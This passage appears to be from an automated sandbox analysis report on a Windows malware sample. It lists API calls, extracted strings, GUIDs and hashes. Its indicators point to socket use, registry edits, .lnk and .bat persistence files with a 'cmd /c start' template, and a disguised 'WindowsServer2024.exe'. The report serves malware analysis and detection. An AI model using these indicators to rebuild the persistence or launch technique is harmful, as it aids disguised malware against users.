                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D252A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2534
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D253E
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D2548
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2552
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocTask$__snwprintf$FolderKnownPathlstrlen$CloseCreateFileHandle$DirectoryErrorLastWrite__snprintf
                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S$WindowsServer2024.exe${268A4BEB-78DB-4CA2-877B-85BE85A2E24B}${35573C81-0DF9-44C4-B616-731CF1FC3E59}${628E1A37-FDD6-4466-82D3-55913E02016C}${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 2364451356-3466433328
                                                                            • Opcode ID: 32495dea968131667e85912eddc8bd2626d32db17671140fcb39347983f0935a
                                                                            • Instruction ID: 709e9f842c8134f36a5974face96bc7d237dc82e724e20ea05a18de5aab44c76
                                                                            • Opcode Fuzzy Hash: 32495dea968131667e85912eddc8bd2626d32db17671140fcb39347983f0935a
                                                                            • Instruction Fuzzy Hash: C2716BB5E00309EBDB10DBA4DC4AFAEBB75BB88701F104918F611B63D0DB789941CB60
                                                                            Function 007DFFF0 Relevance: 61.9, APIs: 41, Instructions: 361networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 007DFFFF
                                                                            • WSACreateEvent.WS2_32 ref: 007E0015
                                                                            • shutdown.WS2_32(000000FF,00000002), ref: 007E04D0
                                                                            • closesocket.WS2_32(000000FF), ref: 007E04DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventclosesocketshutdownsocket
                                                                            • String ID:
                                                                            • API String ID: 3702629066-0
                                                                            • Opcode ID: 9e177c873cce6b7ff2bc361b8b143c808dddfeeef304ee7e77e4b523efad7862
                                                                            • Instruction ID: ba7830024fb15e6a2454efc68be6031411095877d083523de7d6e5f94f2c8b8a
                                                                            • Opcode Fuzzy Hash: 9e177c873cce6b7ff2bc361b8b143c808dddfeeef304ee7e77e4b523efad7862
                                                                            • Instruction Fuzzy Hash: 95F16D74901348EFDF24CFA5D988AADB7B5FF4D310F208959E505A7290D7B89A80DF90
                                                                            Function 007C4C30 Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 257filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C4C50
                                                                            • _memset.LIBCMT ref: 007C4C6F
                                                                            • _memset.LIBCMT ref: 007C4C8E
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007C4CAF
                                                                            • __snwprintf.LIBCMT ref: 007C4CD8
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007C4CE7
                                                                            • _memset.LIBCMT ref: 007C4D06
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 007C4D1A
                                                                            • __snwprintf.LIBCMT ref: 007C4D3C
                                                                            • __snwprintf.LIBCMT ref: 007C4D7C
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 007C4D8D
                                                                            • GetLastError.KERNEL32 ref: 007C4D99
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007C4DCF
                                                                            • __snwprintf.LIBCMT ref: 007C4DF6
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4E17
                                                                            • GetLastError.KERNEL32 ref: 007C4E2C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __snwprintf_memset$CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                                                                            • API String ID: 37154465-2887319354
                                                                            • Opcode ID: fb6e90edcded60354a417d8f14662ffe51353b21e720d4d7bdf605dfb8fc5f1e
                                                                            • Instruction ID: d28fe56e62df085ec1506641f1e2af14345b0a9d1b521c31b8d39269589cc851
                                                                            • Opcode Fuzzy Hash: fb6e90edcded60354a417d8f14662ffe51353b21e720d4d7bdf605dfb8fc5f1e
                                                                            • Instruction Fuzzy Hash: 8BA186B1A00318ABDB24DB64CC49FE977B5BB98704F0445DCF609A7181EBB49B94CFA1
                                                                            Function 007CBE80 Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 217memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007CBE96
                                                                              • Part of subcall function 007C1C80: CreateEventW.KERNEL32(00000000,00000001,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007C1CA2
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1CCC
                                                                              • Part of subcall function 007C1C80: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C1CE0
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1D05
                                                                              • Part of subcall function 007C1C80: __snwprintf.LIBCMT ref: 007C1D2F
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1D70
                                                                              • Part of subcall function 007C1C80: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C1D84
                                                                              • Part of subcall function 007C1C80: LocalAlloc.KERNEL32(00000040,00000DF0), ref: 007C1DA3
                                                                              • Part of subcall function 007C1C80: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007C1DC1
                                                                              • Part of subcall function 007C1C80: GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007C1DD9
                                                                              • Part of subcall function 007C1C80: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007C1DF3
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 007C1E14
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 007C1E2B
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-00000648,00000000), ref: 007C1E42
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CBF0A
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CBF5C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBF90
                                                                            • wnsprintfW.SHLWAPI ref: 007CBFC6
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC019
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC035
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC042
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC04F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC05C
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CC068
                                                                            • closesocket.WS2_32(?), ref: 007CC072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EventLocal$_memsetlstrcpy$AddressAllocDirectoryFreeHandleProcWow64$CloseCreateCurrentDisableModuleOpenRedirectionWindows__snwprintfclosesocketsetsockoptshutdownwnsprintf
                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 535781040-1994081684
                                                                            • Opcode ID: 56af2df0d34fcd72fe5fc52096d7fce2260bbe2526f3340ed2eebf36029427de
                                                                            • Instruction ID: 7b20939c024b8def7aec6793d7ba5287db6f756a9083efc91ad9c66ce61bb082
                                                                            • Opcode Fuzzy Hash: 56af2df0d34fcd72fe5fc52096d7fce2260bbe2526f3340ed2eebf36029427de
                                                                            • Instruction Fuzzy Hash: 2F913DB5A00318EFDB24DBA4DC49FAD7775BB88700F1045ACF609A7291DB789A84CF61
                                                                            Function 007C75B0 Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 285registryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C7603
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C7813
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007C783A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C785B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7868
                                                                            • __snwprintf.LIBCMT ref: 007C789D
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007C78B8
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C7910
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007C7937
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7958
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7965
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C799A
                                                                            • _memset.LIBCMT ref: 007C79D5
                                                                            • __snwprintf.LIBCMT ref: 007C79F3
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 007C7A15
                                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 007C7A2D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C7A4D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7A5A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7A67
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C7AA0
                                                                            • closesocket.WS2_32(?), ref: 007C7AAA
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Delete$AllocFileInfoLocale___crt__snwprintfwnsprintf$CloseOpenValue_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: $#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 421061684-337882337
                                                                            • Opcode ID: c80ac3685a73b0dd5b5aeaa35fc593cbdffca093f0af0ec89882dab8e1076fab
                                                                            • Instruction ID: dc4311d7b9e7d9859e233a425adb5ae6dad368d527bf46a4fe5e8fef46055587
                                                                            • Opcode Fuzzy Hash: c80ac3685a73b0dd5b5aeaa35fc593cbdffca093f0af0ec89882dab8e1076fab
                                                                            • Instruction Fuzzy Hash: 14D106B1D002299BEB24DF64CC49BADB7B4BB44304F10C5D9E649A7281DFB59A84DF90
                                                                            Function 007C97A0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292registrymemorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007C9811
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C982C
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C983B
                                                                            • _memset.LIBCMT ref: 007C985D
                                                                            • __snwprintf.LIBCMT ref: 007C987B
                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 007C98AA
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C98DA
                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 007C9915
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalValue$__snwprintf_memsetlstrcpy
                                                                            • String ID: .DLL$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 2286648044-1817445416
                                                                            • Opcode ID: d0f4e972542e5cfd7dfb286a3ec30c8864ea50cab031c8fc780f9ce4372efd89
                                                                            • Instruction ID: e3caca8645a3dca1ea574e00d25e69627606c7b5b580b93cdfe18fd3fb8960dc
                                                                            • Opcode Fuzzy Hash: d0f4e972542e5cfd7dfb286a3ec30c8864ea50cab031c8fc780f9ce4372efd89
                                                                            • Instruction Fuzzy Hash: 56D1FBB5A00218DFDB64DB64DC8DFAAB7B5BF88300F10859CE609AB250DB759E84CF51
                                                                            Function 007C8CD0 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 290memoryfilestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007C8D3E
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8D59
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C8D68
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 007C8D8D
                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007C8DA6
                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 007C8DBF
                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 007C8DE4
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C8DFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 2968648924-899428287
                                                                            • Opcode ID: c0e25cefb4a77ec5788c1e75dc6e52e0c53ca5f980bb6d10b79654408d1c1c71
                                                                            • Instruction ID: 77ffecaba29a792b2656476712da5543be285452ce6c2c1fa54e5d4a52d8a0d3
                                                                            • Opcode Fuzzy Hash: c0e25cefb4a77ec5788c1e75dc6e52e0c53ca5f980bb6d10b79654408d1c1c71
                                                                            • Instruction Fuzzy Hash: D3C11971E00209EBDB54DFE4D889FAEBBB5BF88300F14851DE615BB290DB799981CB50
                                                                            Function 007DBB20 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 244librarymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007DBB32
                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 007DBB42
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DBB59
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 007DBB7D
                                                                            • ExitProcess.KERNEL32 ref: 007DBE75
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6BFC
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C14
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C2A
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C3F
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C57
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C6D
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C82
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C98
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CB0
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6CC5
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6CDB
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CF3
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D08
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D1E
                                                                            • CloseHandle.KERNEL32(000002EC), ref: 007DBE8F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DBE9F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DBEC6
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DBED6
                                                                            • ExitProcess.KERNEL32 ref: 007DBEE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                            • String ID: KERNEL32.DLL${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 2953619224-2614908309
                                                                            • Opcode ID: 41564a3b3aa5c55c76abd38740294373d9a64cf94b8d118291ec28c79de70ba2
                                                                            • Instruction ID: 8a7a1613407958904ab541db48b69c038ed27c5092612ff5bc1b09be334de313
                                                                            • Opcode Fuzzy Hash: 41564a3b3aa5c55c76abd38740294373d9a64cf94b8d118291ec28c79de70ba2
                                                                            • Instruction Fuzzy Hash: A7A16070A04308EFDF24AFA1DC89BAD7BB1FB44715F21451AF511A6390DBBC8884DB15
                                                                            Function 007C7AC0 Relevance: 47.7, APIs: 25, Strings: 2, Instructions: 403registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C7B13
                                                                            • _memset.LIBCMT ref: 007C7BA4
                                                                            • __snwprintf.LIBCMT ref: 007C7BC2
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 007C7BEC
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C7C80
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007C8096
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80AC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80C2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80D8
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C80F7
                                                                            • closesocket.WS2_32(?), ref: 007C8101
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            • {70F925A9-13A6-49C0-913B-C685A8E9B495}, xrefs: 007C7BAC
                                                                            • SOFTWARE\%s, xrefs: 007C7BB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
